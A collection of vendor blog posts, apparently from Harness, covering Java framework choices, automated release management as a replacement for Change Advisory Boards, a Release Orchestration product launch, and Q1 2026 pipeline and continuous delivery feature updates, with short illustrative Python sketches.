On the JVM, a typical Spring Boot service starts in 2 to 5 seconds and runs in 200 to 400 MB, while a Quarkus service starts closer to 1 second and runs in 150 to 250 MB. As GraalVM native binaries, both Spring Boot (via Spring AOT) and Quarkus start in 30 to 100 milliseconds and run in 30 to 80 MB. The real performance difference shows up in cold-start-sensitive deployments like serverless and scale-to-zero workloads, where native compilation moves from a nice-to-have to a requirement.
Java 21 LTS is the production baseline for most enterprise Java fleets, and Java 25 LTS (released September 2025) is what platform teams are migrating to over the next 12 to 18 months. Java 17 should be treated as the floor, not the target. Avoid non-LTS releases (currently Java 26) for production unless you have a specific reason to track preview features, since support windows for non-LTS versions are six months. Both Spring Boot 4 and Jakarta EE 11 support Java 21, and both benefit further from the enhancements in Java 25.
Yes, and most enterprise Java fleets do exactly this. The technical compatibility is straightforward because both stacks produce standard container images and both expose health, metrics, and logs through OpenTelemetry-compatible instrumentation. The harder problem is operational consistency: enforcing the same release strategies, observability conventions, and governance policies across both stacks. Policy-as-code and unified delivery pipelines solve this regardless of which frameworks are in the mix.
Java EE under that name ended in 2017, but the platform is alive and actively developed under the Jakarta EE name at the Eclipse Foundation. Jakarta EE 11 shipped in 2025 with new specifications including Jakarta Data and first-class virtual thread support. Modern runtimes like Quarkus, Helidon, Open Liberty, Payara, and WildFly implement Jakarta EE specifications in cloud-native form. The "Java EE is dead" narrative was specifically about heavyweight application servers like WebLogic and WebSphere full profile, which are an active migration target rather than a forward choice.


The thing with Change Advisory Boards is that the intent was always good. Get smart people in a room, look at the evidence, and make sure nothing catastrophic goes out the door. In theory, that's hard to argue with.
In practice, it doesn't scale. Things happen between meetings. Teams rush to hit the window. The CAB meeting may not catch every risky deployment, but at least everyone can feel good about the process before the incident happens.
Automated release management asks a different question entirely. Not "did a human approve this?" but "has this change actually proven it's safe?" Governance moves into the pipeline itself, running the same checks on every change at whatever speed your teams ship.
That's exactly what Harness Continuous Delivery is built for: policy-driven pipelines, automated assurance, and governance that scales with your teams.
Automated release management replaces manual review and approval steps with automated quality gates, policy enforcement, and deployment orchestration.
Rather than routing change decisions through a central committee, automated systems evaluate each change against defined criteria like test coverage, security scans, rollback definitions and compliance checks, then approve or block it based on objective results.
That does not get rid of governance. It brings governance into the delivery pipeline and consistently applies it to all changes, not just the ones that make it onto a CAB agenda.
Automated release management paired with a continuous delivery platform allows teams to deploy frequently, recover quickly, and audit completely, with no meeting necessary.
The CAB model made sense when software changed slowly and release cycles were long. Cross-functional stakeholders would review evidence packets, testing results, deployment plans, and security scans, then determine whether a release was safe to promote.
The problem is that the model doesn't scale well as the speed of delivery accelerates. Some patterns keep repeating themselves:
DORA's research provides a useful gut-check here: high-performing engineering teams deploy far more frequently than their peers, and they do so with lower change failure rates, not higher. It's not approval volume that matters; it's pipeline discipline.
The fundamental problem is not that governance is bad. It is that a meeting-based governance model cannot keep up with a continuous delivery operating model.
Automated release management differs from the CAB model in the question at the heart of the process.
Old model: Who approved this? New model: What did this change prove before we shipped it?
That reframe yields a meaningfully different architecture. Governance takes place on every change, not at scheduled times. Pass/fail criteria are deterministic, not subjective. Compliance is an output of the pipeline, not a prerequisite to enter it.

All changes must be traceable without requiring manual compilation. Version control becomes the single source of truth. CI systems automatically generate commit history, build artifacts and deployment-linked changelogs as part of normal pipeline execution. By default, the audit trail is there.
Harness GitOps takes this a step further, using Git as the single source of truth for the state of the deployment. All configuration changes are versioned, all deployments are tracked, and drift is detected automatically.
Validation moves from presentations to execution. Quality gates run on every change: unit and integration tests, end-to-end validation, security and compliance scans, and performance checks. These are not release-window activities. They are part of the standard CI/CD pipeline, running continuously on every change that moves through.
Harness Powerful Pipelines supports multi-stage pipeline orchestration across complex environments with built-in test intelligence and conditional execution logic. Quality gates run fast and don't create unnecessary bottlenecks.
CAB rules get codified in an automated release management model. No critical vulnerabilities before production promotion. Minimum thresholds for test coverage. Mandatory rollback procedure definitions. These policies are automatically enforced in the pipeline. Pass, and the change proceeds. Fail, and it's reliably blocked at scale, with no human bottleneck in the critical path.
That's what policy as code is all about: governance that's version-controlled, auditable and applied the same way every time.
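As a rough illustration of the three example rules above, the sketch below expresses them as a single evaluation function in Python. It is not Harness or OPA syntax. The `ChangeEvidence` fields, the `evaluate` function, and the 80% coverage threshold are all hypothetical names and values chosen for this example.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ChangeEvidence:
    """Evidence a pipeline might collect for one change (hypothetical shape)."""
    critical_vulnerabilities: int
    test_coverage: float  # fraction between 0.0 and 1.0
    rollback_defined: bool


MIN_COVERAGE = 0.80  # hypothetical threshold, not a recommended value


def evaluate(change: ChangeEvidence) -> list[str]:
    """Return the violated policies; an empty list means the change may proceed."""
    violations = []
    if change.critical_vulnerabilities > 0:
        violations.append("critical vulnerabilities present")
    if change.test_coverage < MIN_COVERAGE:
        violations.append(f"test coverage below {MIN_COVERAGE:.0%}")
    if not change.rollback_defined:
        violations.append("no rollback procedure defined")
    return violations


print(evaluate(ChangeEvidence(0, 0.91, True)))
print(evaluate(ChangeEvidence(2, 0.55, False)))
```

Because the rules live in a file, they can be reviewed, versioned, and applied identically to every change, which is the property the text is describing.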
Harness DevOps Pipeline Governance lets teams define and enforce pipeline policies in one place. Compliance is not something you check at the end. It's something the pipeline enforces throughout.
Even with strong quality gates, production deployments carry residual risk. Test environments do not always mirror what production surfaces.
Harness AI-Assisted Deployment Verification automatically analyzes deployment health using ML to compare metrics, logs and traces against baseline behavior. When something drifts, it surfaces the signal quickly, enabling rollback before an incident escalates. This closes the loop between deployment and validation, making the pipeline genuinely self-correcting, not just self-approving.
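The underlying idea of comparing post-deployment signals against a baseline can be sketched very simply. The Python example below is a deliberately naive stand-in that uses a fixed relative tolerance on mean error rate. It is not the ML analysis described above, and the `should_roll_back` function and its `tolerance` parameter are assumptions made for illustration.

```python
from statistics import mean


def should_roll_back(
    baseline: list[float], canary: list[float], tolerance: float = 0.5
) -> bool:
    """Return True when the new version's mean error rate exceeds the
    baseline mean by more than the given relative tolerance."""
    return mean(canary) > mean(baseline) * (1 + tolerance)


# Error rates sampled before and after a deployment (made-up numbers).
print(should_roll_back([0.010, 0.010], [0.011, 0.012]))
print(should_roll_back([0.010, 0.010], [0.030, 0.020]))
```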
In practice, systems rarely exist in isolation. One change can affect backend services, APIs, web apps, mobile apps and edge targets all at once. In tightly coupled systems, changes to one component can cause another to break, and partial deployments can be risky without careful coordination.
Traditional coordination uses spreadsheets, emails, and war rooms. Modern automated release management means orchestration: platforms that model service dependencies, trigger pipelines in the right order, and ensure all components pass quality gates before release. Multi-team coordination becomes a single-action, end-to-end deployment.
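The orchestration idea, modeling dependencies, ordering deployments, and refusing to release until every component has passed its gates, can be sketched with Python's standard `graphlib` module. The `release_order` function, the service names, and the `gates_passed` mapping are hypothetical and exist only for this example.

```python
from graphlib import TopologicalSorter


def release_order(
    depends_on: dict[str, set[str]], gates_passed: dict[str, bool]
) -> list[str]:
    """Return a deployment order that respects dependencies, or raise if
    any service in the release has not passed its quality gates."""
    services = set(depends_on).union(*depends_on.values())
    failed = sorted(s for s in services if not gates_passed.get(s, False))
    if failed:
        raise RuntimeError(f"quality gates not passed: {', '.join(failed)}")
    return list(TopologicalSorter(depends_on).static_order())


deps = {"web": {"api"}, "api": {"db"}, "db": set()}
print(release_order(deps, {"web": True, "api": True, "db": True}))
```

Checking every gate before computing the order is what prevents a partial rollout: nothing is deployed unless the whole set is releasable.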
Harness Continuous Delivery has built-in support for orchestrated multi-service deployments with dependency mapping and conditional promotion logic. Deploy Anywhere extends this to cloud, hybrid, on-prem and edge environments without requiring separate toolchains for each target.
Harness pipelines also support canary deployments and GitOps-based progressive delivery for rollout strategies tailored to deployment risk.
Managing interdependent releases is a good start. The goal is to reduce the coupling itself so teams can ship independently without synchronized multi-team deployments. Three practices tend to accelerate that:
Together, these patterns move teams toward the continuous delivery ideal: frequent, small, independent releases, each of which is safe on its own.
The results of replacing CAB-driven processes with policy-driven pipelines and automated assurance are measurable:
Harness CD Visualize DevOps Data surfaces deployment frequency, change failure rates and mean time to recovery in real time. These are the DORA metrics that measure delivery health with zero instrumentation overhead.
CABs were created for a slower world, where a weekly review meeting could credibly keep up with the cadence of releases. That world is long gone for most engineering organizations today.
The takeaway here is this: automated release management doesn't remove governance. It rebuilds governance as a system that is fast, consistent, auditable and embedded directly in the delivery pipeline. The teams that move fastest aren't the ones with the loosest controls. They're the ones with controls that don't slow them down.
If you're ready to move from approval bottlenecks to automated assurance, Harness Continuous Delivery is built for exactly that.
Automated release management is the practice of using automated quality gates, policy enforcement and deployment orchestration to replace manual approval steps in the software release process. Rather than routing changes to a committee, the pipeline evaluates each change against predefined criteria and approves or blocks it based on objective results.
A CAB relies on scheduled human review to approve changes before they go into production. Automated release management takes that validation and builds it into the pipeline itself, running the same checks on every change instead of batching them for periodic review. The result is faster delivery with more consistent governance.
Quality gates are automated checkpoints a change must pass before moving to the next stage. Common examples include test coverage thresholds, security scan results, and performance benchmarks. A change that fails a gate is blocked automatically, without human intervention.
Policy as code is the practice of expressing governance rules in version-controlled configuration files rather than documents or meeting agendas. The pipeline then automatically enforces those rules on every deployment, making compliance consistent and auditable by default.
Feature flags decouple code deployment from feature activation. Teams can ship code continuously without exposing unfinished features to users, and can disable a feature instantly if it causes issues in production, without triggering a full rollback.
Incremental strategies like canary deployments work well because they limit the blast radius of any given change. Paired with automated verification, the pipeline can catch problems early in the rollout and halt or roll back before they affect all users.
Harness Continuous Delivery provides end-to-end pipeline orchestration, built-in policy governance, GitOps-based change tracking, AI-assisted deployment verification, and real-time DORA metrics. It's designed to replace manual release processes with automated systems that scale across any environment.


Modern software delivery has evolved far beyond single-service deployments. Today's releases span dozens of services, multiple teams, and complex approval workflows—coordinated through spreadsheets, Slack channels, and manual checklists scattered across tools. When a production release involves deploying ten microservices across three environments, enabling five feature flags, running security scans, collecting approvals from four stakeholders, and coordinating with three different teams, the question isn't whether you can ship—it's whether you can track what shipped, when it shipped, and who approved it.
Release Orchestration solves this. It provides a unified framework for modeling, scheduling, automating, and tracking complex software releases across teams, tools, and environments—giving you end-to-end visibility from planning through production deployment and monitoring.
Without orchestration, enterprise releases become coordination nightmares. Status lives in spreadsheets that go stale within hours. Coordination happens through email threads spanning dozens of messages. There's no single source of truth for what was deployed, when, or by whom. Manual checklists drift out of sync. Approval workflows rely on memory and goodwill. And when something goes wrong at 2 AM, reconstructing what happened requires archaeology across multiple systems.
Release Orchestration transforms this chaos into structured, auditable, repeatable processes. Model your release blueprint once—defining phases, activities, dependencies, and approval gates—then execute it repeatedly with different configurations. Automate pipeline-backed steps while retaining manual sign-offs where governance requires them. Track activity-level status, phase-level progress, and overall release health in real time. Enforce approvals, capture sign-offs, and maintain a full audit trail linking code to deployment to business outcome.
The result? Releases that used to require days of coordination now run faster with complete visibility and zero spreadsheets.
Release Orchestration introduces a structured, visual approach to modeling and executing releases. Define Processes—reusable blueprints composed of Phases (Build, Testing, Deployment) and Activities (automated pipelines, manual approvals, or nested subprocesses). Release Groups define cadences and automatically generate releases. The Release Calendar provides unified visibility across all releases. The Activity Store and Input Store promote reusability—define once, execute many times with different configurations. And ad hoc releases let you execute any process on demand when you need flexibility outside your regular schedule.
At its core, Release Orchestration delivers the foundational capabilities enterprise teams need: process modeling with visual editors, scheduled and recurring releases through release groups, real-time execution tracking with dependency management, comprehensive audit trails for compliance, and AI-powered process creation that transforms natural language descriptions into structured workflows. These capabilities form the foundation for enterprise release management at scale.
Release Orchestration launches with a comprehensive set of capabilities designed for enterprise release management. Here's what you can do today.
Not every release fits a regular schedule. Customer-specific deployments, unscheduled maintenance, and process testing need one-off releases. Ad hoc releases let you create and execute releases on demand: select a process, configure timing, provide inputs, and optionally run immediately. Test new processes in isolation, handle customer deployments without disrupting your calendar, or orchestrate emergency maintenance with full tracking and audit capabilities.
Modern releases deploy multiple services across multiple environments. Release Orchestration's input system handles this through variable mapping: define global variables like `releaseVersion` and `targetEnvironment` once, and they flow automatically to all activities. Deploy to QA with "QA Inputs" and to production with "Production Inputs": same process, different configurations. This eliminates repetitive data entry, ensures consistency, and scales from three services to thirty without growing complexity.
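The "define once, flow everywhere" behavior can be pictured as a simple merge of global variables with a named input set. The Python sketch below is a conceptual model only, not the Release Orchestration data format. The `resolve_inputs` function and the activity names are hypothetical.

```python
def resolve_inputs(
    global_vars: dict[str, str],
    input_set: dict[str, str],
    activities: list[str],
) -> dict[str, dict[str, str]]:
    """Give every activity the same merged view of global variables and
    the chosen input set (input-set values win on conflict)."""
    merged = {**global_vars, **input_set}
    return {activity: dict(merged) for activity in activities}


global_vars = {"releaseVersion": "1.4.0"}
qa_inputs = {"targetEnvironment": "qa"}
prod_inputs = {"targetEnvironment": "production"}
activities = ["deploy-api", "deploy-web"]

print(resolve_inputs(global_vars, qa_inputs, activities))
print(resolve_inputs(global_vars, prod_inputs, activities))
```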
Release Orchestration integrates with Harness's centralized notification framework, delivering alerts when releases start, pause for input, complete, or fail. Route notifications to Slack, email, PagerDuty, Microsoft Teams, or webhooks. Platform teams managing multiple releases shift from reactive monitoring to proactive awareness—get notified immediately when action is required.
Compliance reviews and post-mortems require detailed records. Release Orchestration provides downloadable Excel reports with complete execution history—every activity, status, timestamps, approvals, and inputs used. Generate reports for individual releases (sprint retrospectives) or release groups (quarterly audits). Activity-level detail meets compliance needs; process-level overviews serve executive summaries. All execution data is captured in the audit trail, allowing you to reconstruct exactly what happened during any release.
As releases scale, filters help you focus. Filter by source (ad hoc vs recurring), status (in progress, completed, failed), time window (this sprint, Q1 2026), environment (production, staging), or scope (specific orgs/projects). Platform teams filter to ad hoc releases for one-off deployments. Release managers filter by status for in-progress releases. Compliance teams filter by date range for audit periods. Transform an overwhelming calendar into a focused view of exactly what you need.
Production incidents don't wait for your release cadence. Release Orchestration supports hotfix workflows that fast-track emergency releases while maintaining governance. Mark releases as hotfixes to distinguish them in calendars and reports. The system detects execution conflicts—if a hotfix targets an environment where a release is running, you get visibility to coordinate decisions. Hotfixes use the same process structure, ensuring that approvals and audit trails are maintained. The hotfix designation flows through reports and logs, documenting emergency procedures for post-incident reviews. Speed meets governance.
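The conflict check described above amounts to asking whether any running release targets the same environment as the hotfix. A minimal Python sketch follows. The `Release` record and `find_conflicts` function are hypothetical and do not reflect the product's actual data model.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Release:
    """Hypothetical release record used only for this illustration."""
    name: str
    environment: str
    running: bool
    hotfix: bool = False


def find_conflicts(hotfix: Release, others: list[Release]) -> list[str]:
    """Names of running releases that target the hotfix's environment."""
    return [
        r.name for r in others
        if r.running and r.environment == hotfix.environment
    ]


scheduled = [
    Release("march-train", "production", running=True),
    Release("qa-refresh", "staging", running=True),
    Release("feb-train", "production", running=False),
]
fix = Release("login-hotfix", "production", running=False, hotfix=True)
print(find_conflicts(fix, scheduled))
```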
Not everything can be automated. Security reviews, architectural approvals, and stakeholder sign-offs require human judgment. Release Orchestration treats manual activities as first-class citizens with the same visibility and dependency support as automated activities. Manual activities pause execution until someone provides input—an approval, verification, or checklist confirmation. Notifications alert the responsible person; they review the context and complete the activity, optionally leaving notes. Manual activities can depend on automated activities (approval after deployment) or vice versa (deployment after approval). All completions appear in audit trails and reports for compliance documentation.
Release Orchestration provides primitives—processes, phases, activities, dependencies, inputs—that compose to match how your organization ships software. Model microservice releases with parallel deployments and end-to-end tracking. Define compliance-driven releases with approval gates at critical checkpoints. Create streamlined hotfix workflows for emergencies. Coordinate feature flag enablement with deployments. Assign phase owners for multi-team coordination with notification-driven handoffs. The system scales from simple three-phase releases to complex workflows with fifty activities and nested subprocesses.
Harness AI transforms natural language descriptions into structured processes. Describe your workflow—"Create a multi-service release with phases for build, testing, deployment, and monitoring. Assign owners for Development, QA, and DevOps,"—and AI generates the complete structure with phases, activities, and dependencies. Refine the generated process by adding activities, adjusting dependencies, and configuring inputs. This reduces process modeling time from hours to minutes, making it practical to create specialized processes for different release types.
Release Orchestration provides real-time tracking at three levels: activity (running, succeeded, failed, waiting), phase (overall progress), and process (end-to-end status). The execution graph shows phases as nodes, dependencies as arrows, and color-coded status on each activity. Drill into pipeline executions from the release view with one click. See approval history for manual activities—who approved, when, and with what notes. This unified view eliminates the need to check multiple systems. Platform teams can see at a glance which releases are progressing smoothly, which are awaiting approval, and which need attention. [Learn more →](https://developer.harness.io/docs/release-orchestration/execution/activity-execution-flow)
Release Orchestration is available now in Harness. Contact Harness Support to enable the module for your account. Once enabled, explore Processes (model release blueprints), Release Calendar (schedule and track releases), Activity Store (reusable activities), and Input Store (configuration sets). The getting started guide walks you through creating your first AI-powered process, adding activities, and executing a release.
We're actively developing additional capabilities: deeper analytics and insights (release velocity metrics, phase duration trends, failure pattern analysis), advanced dependency modeling (cross-release dependencies, environment-level locking), enhanced collaboration (in-line comments, Slack-native monitoring), a template marketplace for common release patterns, and API/GitOps for managing processes as code. The roadmap prioritizes capabilities that help teams ship faster with greater confidence.
Software delivery has evolved far beyond single-service deployments, but release management tooling hasn't kept pace. Spreadsheets, email coordination, and manual checklists don't scale to modern microservice architectures, multi-team workflows, and compliance requirements. Release Orchestration provides the unified framework enterprise teams need to model, automate, and track complex releases across teams, tools, and environments.
Define reusable processes. Execute them with different inputs. Track activity-level progress. Enforce approvals and capture sign-offs. Maintain complete audit trails. All in one place, integrated with the pipelines and deployment workflows you already use.
Ready to see it in action? Explore the Release Orchestration documentation or reach out to your Harness account team to discuss how Release Orchestration can transform your release workflows.
The future of release management isn't about doing the same manual coordination faster—it's about orchestrating releases as structured, repeatable, auditable processes. That future is available today.


Welcome to our Q1 2026 Pipeline update! This quarter brings eight major enhancements that make pipeline development faster, validation easier, and governance stronger. From Git tags for immutable pipeline versions to AI-assisted policy authoring, these capabilities address the most common friction points teams encounter when scaling pipeline automation across their organizations. This update complements our Continuous Delivery & GitOps update released today, which covers expansions to the deployment platform and AI-powered verification.
Pipeline development workflows gain significant GitX improvements this quarter, bringing immutable versioning, flexible testing, and pre-commit validation directly into your Git-based workflows.
Pipelines stored in Git can now be triggered and executed from Git tags, not just branches. This unlocks release workflows where pipeline versions align with semantic versioning tags in your repository—when you tag a release as `v2.1.0` in Git, run that exact pipeline version via the UI or API. Tags provide immutable references to specific pipeline states, making it easy to replay historical pipeline configurations for compliance audits, debugging, or managing multiple product versions in parallel.
Learn more about Git tags for pipelines →
Pipeline chaining now supports branch selection for child pipelines, not just the default master branch. When configuring a Pipeline stage, specify which branch of the child pipeline to execute, enabling proper testing of parent-child pipeline integrations before merging to production. This is crucial when output variables from the child pipeline are only available in a feature branch, or when you're testing coordinated changes across multiple chained pipelines.
Learn more about pipeline chaining →
A new validation API lets you check pipeline YAML before committing changes to your repository. The API validates YAML syntax, schema conformance, entity references (Services, Environments, Connectors, Templates), RBAC permissions, OPA policy compliance, and expression syntax, all without actually running the pipeline or updating it in Harness. This closes a critical gap in GitOps workflows, where changes made directly in GitHub bypass Harness validation. Teams can now validate bulk updates in feature branches before merging and catch configuration errors early.
Directed Acyclic Graph (DAG) execution support moves to Phase 2 with full UI integration. Define complex step dependencies in which multiple steps can run in parallel but must complete before downstream steps begin, within a single stage. DAG support enables sophisticated deployment patterns, such as parallel infrastructure provisioning followed by application deployment, or concurrent test suite execution with a final aggregation step. The visual graph makes it easy to understand execution flow and identify bottlenecks, while the declarative YAML representation keeps configuration simple.
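To show what "parallel steps that must complete before downstream steps begin" means in scheduling terms, here is a small Python sketch that groups steps into waves using the standard `graphlib` module. It illustrates the general DAG technique, not the Harness execution engine. The `execution_waves` function and step names are assumptions for this example.

```python
from graphlib import TopologicalSorter


def execution_waves(depends_on: dict[str, set[str]]) -> list[list[str]]:
    """Group steps into waves: every step in a wave can run in parallel,
    and a wave starts only after all earlier waves have finished."""
    sorter = TopologicalSorter(depends_on)
    sorter.prepare()  # raises graphlib.CycleError if the graph has a cycle
    waves = []
    while sorter.is_active():
        ready = sorted(sorter.get_ready())
        waves.append(ready)
        sorter.done(*ready)
    return waves


steps = {
    "deploy-app": {"provision-network", "provision-database"},
    "smoke-test": {"deploy-app"},
}
print(execution_waves(steps))
```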
Pipeline observability and notification capabilities expand to give platform teams better visibility into queue states and more granular control over failure alerting.
A new Account Settings page surfaces all queued pipelines across your entire account, showing queue position, org/project filters, and estimated execution order. The queue view includes bulk abort capabilities for queued pipelines and is available to Account Admins. For teams using pipeline queues to manage deployment locks or shared resource access, this visibility eliminates the mystery of why a pipeline is waiting and how long it's likely to remain queued.
Learn more about pipeline queuing →
Centralized notifications now support step-specific failure triggers, not just stage-level or pipeline-level failures. Configure notifications to fire only when a particular critical step fails—like a production deployment step or a compliance validation check—reducing alert noise and ensuring teams get notified about failures that actually matter. This granular control means you can route different failure types to different teams or channels: a failed security scan notifies the security team, while a failed deployment step notifies the on-call engineer.
Learn more about pipeline notifications →
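Step-specific routing can be thought of as a lookup from failed step to recipient. The Python sketch below models that idea. The `ROUTES` table, step identifiers, and `recipients_for` function are hypothetical and are not the Harness notification configuration format.

```python
# Hypothetical routing table: only these steps trigger a notification.
ROUTES = {
    "security-scan": "security-team",
    "deploy-production": "on-call-engineer",
}


def recipients_for(failed_steps: list[str], routes: dict[str, str]) -> list[str]:
    """Return who to notify, in order, ignoring steps with no route."""
    notified = []
    for step in failed_steps:
        target = routes.get(step)
        if target is not None and target not in notified:
            notified.append(target)
    return notified


print(recipients_for(["lint", "security-scan"], ROUTES))
print(recipients_for(["deploy-production", "security-scan"], ROUTES))
```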
OPA policy capabilities receive significant AI-powered enhancements and full GitX integration, making governance more accessible and easier to scale across organizations.
An AI assistant helps write OPA policies, reducing the expertise barrier for policy creation. Describe your governance requirements in natural language, and the assistant generates the corresponding Rego policy with explanations of how it works. This democratizes policy authoring beyond Rego experts, enabling security teams, compliance officers, and platform engineers to codify governance requirements without deep OPA expertise.
Learn more about OPA AI Assistant →
OPA policies now support the full GitX experience, including branch switching, bidirectional sync, and package name management. Policies can be developed and tested in feature branches before rolling out to production, with PR workflows providing change review and approval. This brings the same infrastructure-as-code benefits you have for pipelines and templates to your governance layer, enabling version control, change tracking, and collaborative policy development.
Learn more about OPA GitX integration →
New APIs support evaluation by both policy set IDs and entity-type/action pairs, giving teams greater flexibility in structuring and applying policies across their organizations. This enables more sophisticated policy architectures in which different evaluation strategies can be applied to distinct workflows or organizational structures.
Learn more about OPA policies →
The features highlighted in this update are available now in Harness Platform. Ready to see them in action? We've created a comprehensive video playlist that walks through these capabilities, featuring live demos and configuration guides.
Watch the Q1 2026 Pipeline Feature Playlist →
From Git-based pipeline versioning to AI-assisted policy authoring, this quarter delivers capabilities that streamline development workflows, improve validation practices, and strengthen governance controls. Whether you're managing dozens or thousands of pipelines, these enhancements reduce configuration overhead and align with how modern platform engineering teams scale automation across their organizations.
Be sure to also check out our companion post covering [Continuous Delivery & GitOps innovations](#)—including AI-powered verification, Azure Container Apps support, Windows deployment enhancements, and more.
Explore the documentation links throughout this post to dive deeper into each feature, or reach out to your Harness account team to discuss how these capabilities can accelerate your pipeline development and governance workflows.
What's coming next? Q2 2026 will bring advanced pipeline debugging capabilities, expanded expression engine functionality, and continued investment in GitX experience improvements. Stay tuned for more updates - we're just getting started.


Welcome back to the quarterly update series! If you've been following along, you've seen how Q3 2025 brought deeper control and strengthened integrations, while Q4 2025 closed the year strong with platform upgrades and quality-of-life improvements. The first quarter of 2026 builds on these foundations with AI-powered continuous verification that eliminates configuration overhead, expanded deployment platform support, and GitOps workflow enhancements that align with how teams actually ship software.
Native support for Azure Container Apps brings serverless container orchestration to your Azure workloads with the full Harness deployment experience. Azure Container Apps provides a fully managed platform for running microservices and containerized applications with automatic scaling based on HTTP traffic or events, and now you can deploy to it with the same confidence and control you have for Kubernetes, ECS, and other platforms.
Harness gives you two deployment strategies designed for Azure Container Apps' architecture. Choose Basic deployments for immediate traffic cutover when you need speed, or use Canary deployments with progressive traffic shifting (20% → 70% → 100%) using Azure Container Apps' built-in revision management to validate new versions under real production load. The platform includes automated rollback that captures container app state before deployment, enabling instant recovery if issues arise. Authentication is flexible: support for both Azure OIDC (keyless authentication) and Service Principal methods means you can deploy across subscriptions using a single connector, with full support for Azure Container Registry (ACR) and Docker Hub as artifact sources.
Learn more about Azure Container Apps deployments →
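The progressive traffic shift mentioned above (20% → 70% → 100%) follows a simple control loop: move some traffic, verify, then either continue or roll back. The Python sketch below models only that loop. The `run_canary` function and the `is_healthy` callback are hypothetical, and no Azure or Harness API is called.

```python
from typing import Callable

CANARY_STEPS = (20, 70, 100)  # traffic percentages quoted in the text


def run_canary(
    is_healthy: Callable[[int], bool], steps: tuple[int, ...] = CANARY_STEPS
) -> int:
    """Return the final share of traffic on the new revision:
    the last step if every check passed, or 0 after a rollback."""
    for percent in steps:
        # A real system would shift traffic to `percent` here, then verify.
        if not is_healthy(percent):
            return 0  # roll back: all traffic returns to the old revision
    return steps[-1]


print(run_canary(lambda percent: True))
print(run_canary(lambda percent: percent < 70))
```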
This year, we're focusing heavily on Windows deployments to address the performance and scalability challenges that enterprise Windows teams face every day. The two enhancements shipping this quarter are just the beginning—we're bringing the same innovation velocity to Windows deployments that you've come to expect across all Harness platforms. Stay tuned for more Windows Deployment capabilities throughout 2026 that will continue to streamline your deployment processes and eliminate friction in enterprise Windows environments.
Learn more about Windows deployments →
Windows Session Reuse eliminates redundant connection overhead by enabling delegate-wide session pooling, cutting connection setup time from 30-60 seconds to instant reuse in JEA environments. When a command step executes, Harness checks the pool for an existing idle session to the target host with matching credentials and reuses it immediately, dramatically reducing pipeline execution time for workflows with multiple command steps.
Learn more about Windows Session Reuse →
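The pooling behavior described above, checking for an idle session to the same host with matching credentials before opening a new one, can be sketched in a few lines of Python. The `SessionPool` class and its `connect` callback are hypothetical, and the sketch omits the locking, expiry, and health checks a real pool would need.

```python
from typing import Callable


class SessionPool:
    """Reuse idle sessions keyed by (host, credential id)."""

    def __init__(self, connect: Callable[[str, str], object]):
        self._connect = connect
        self._idle: dict[tuple[str, str], list[object]] = {}

    def acquire(self, host: str, credential_id: str) -> object:
        idle = self._idle.get((host, credential_id))
        if idle:
            return idle.pop()  # instant reuse, no connection setup
        return self._connect(host, credential_id)  # slow path: new session

    def release(self, host: str, credential_id: str, session: object) -> None:
        self._idle.setdefault((host, credential_id), []).append(session)


opened = []


def fake_connect(host: str, credential_id: str) -> object:
    opened.append((host, credential_id))
    return object()


pool = SessionPool(fake_connect)
first = pool.acquire("win-01", "svc-deploy")
pool.release("win-01", "svc-deploy", first)
second = pool.acquire("win-01", "svc-deploy")
print(second is first, len(opened))
```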
Multi-Host Deployment with Dynamic Targeting extends Windows Deployment credential setup to dynamically target different hosts, enabling true parallel execution across multiple Windows servers. Configure multiple host groups within a single credential configuration, and Harness automatically routes commands to the appropriate servers based on your deployment strategy. This unlocks centralized credential management while maintaining the security boundaries required in JEA environments, enabling teams managing large Windows server fleets to deploy faster with reduced credential sprawl.
Learn more about Multi-Host Windows Deployments →
Amazon ECS deployments get two powerful new capabilities that bring operational flexibility and automation to your container workloads.
Standalone ECS Scaling lets you scale services up or down without triggering a full deployment, enabling operators to respond to real-time demand without triggering change management processes. The new ECS Scale step lets you modify desired task counts on demand—whether you're responding to traffic spikes, performing maintenance windows, or testing capacity limits—without redeploying your application.
Learn more about ECS scaling →
ECS Scheduled Actions enable time-based scaling policies directly within your ECS service deployments, eliminating the need to manage scheduled actions separately in the AWS console while keeping your entire ECS configuration under version control. Define scheduled actions to automatically adjust desired task counts at specific times—scale up services before anticipated morning traffic, scale down during off-peak hours, or align capacity with predictable business patterns.
Learn more about ECS scheduled actions →
Terraform deployments now include automatic security protections that prevent accidental exposure of sensitive data throughout your pipeline workflows.
Terraform outputs marked as `sensitive = true` are now automatically masked in the Harness UI, preventing accidental exposure of credentials, API keys, and other secrets in pipeline execution logs and output tabs. When Terraform outputs are marked as sensitive, Harness respects that designation and redacts the values wherever they appear—you can still reference these outputs in downstream steps using expressions, but the actual values remain encrypted and hidden from view.
Learn more about masking sensitive outputs →
This quarter's focus on continuous verification centers on eliminating configuration overhead through AI automation and expanding observability platform integrations. From zero-config deployment health analysis to Git-based configuration management, these capabilities make verification accessible to more teams while reducing the time to production-ready monitoring.
Alongside AI Verify, AI-assisted health source configuration makes traditional verification setup effortless through a guided workflow that discovers available signals from your observability platform, classifies them by deployment impact, and generates verification-ready configurations. Describe your service and monitoring goals in natural language, and the Configuration Agent automatically discovers relevant metrics, organizes them into intelligent categories, and generates the queries and thresholds for you—with human checkpoints for selection and refinement at every stage.
Fine-tune configurations with simple natural language inputs or create custom composite metrics on the fly. What used to take hours now takes minutes.
AI Verify eliminates the manual setup complexity that has traditionally slowed the adoption of continuous verification. No more baseline configuration, threshold tuning, or monitored service management. AI Verify deploys lightweight data-collection plugins into your Kubernetes cluster that collect, aggregate, and provide observability data while stripping personally identifiable information before it leaves your environment.
The plugins gather logs and metrics from your observability platforms and perform statistical and algorithmic anomaly detection. Large language models then contextualize these anomalies against your deployment verification criteria, filter false positives based on business-criticality, and synthesize natural-language root-cause insights with actionable remediation suggestions—all without requiring explicit baseline data. This shifts continuous verification from weeks of configuration work to immediate, intelligent monitoring that understands your services from day one.
Learn more about AI-powered verification →
Harness Continuous Verification now supports Dynatrace Query Language (DQL) for querying timeseries metrics from Dynatrace Grail, their next-generation data lakehouse. Craft sophisticated metric analysis using aggregation functions, enable dimension-based data splitting for per-instance continuous verification, and combine multiple data sources in a single query. This extends beyond the traditional Full Stack Observability model, giving you direct access to custom metric queries rather than relying solely on predefined metric packs.
Learn more about Dynatrace DQL support →
GitOps workflows gain AI-powered intelligence, unified notifications, and enhanced PR capabilities this quarter. These improvements streamline application management, improve operational visibility, and align GitOps workflows with how teams naturally collaborate through pull requests.
